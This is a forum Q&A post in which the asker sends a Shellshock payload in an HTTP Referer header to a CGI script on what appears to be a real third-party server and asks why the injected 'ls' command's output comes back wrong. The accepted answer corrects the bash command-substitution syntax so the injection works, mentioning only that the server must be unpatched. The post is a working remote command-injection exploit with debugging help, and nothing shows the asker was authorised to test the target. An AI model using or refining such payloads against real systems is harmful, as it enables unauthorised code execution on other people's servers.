# How can execute bash command in server from http header using python?

Tags: python, bash, ubuntu, cgi

i have following script in python

```py
headers = {'Referer': """() { :;}; y="($ls)";echo 'ls_result: '$y; """}
r = requests.get("http://manticore.2y.net/cgi-bin/dlwct.sh",headers=headers)
```

and

```
r.headers
```

is

```
{
'x-rdir': '""', 'x-vps': 'yes',
 'transfer-encoding': 'chunked',
 'server': 'Apache/1.3.29',
 'connection': 'close',
 'date': 'Thu, 23 Oct 2014 09:13:47 GMT',
 'ls_result': '()', 
'content-type': 'text/html'
}
```

when i passing **y="(ls)"** in **header**. i am getting  `'ls_result': '(ls)'` in response header.
why $ stripping from my input?
how can list directory in response header ?
PS: this is for educational purpose

Answer (score 2, accepted):

The syntax for executing a command and assigning its output to a variable is:

```
y="$(ls)"
```

You had the `$` inside the parentheses, it should be outside.

Note that your code will only execute the shell command if you haven't patched the ShellShock vulnerability.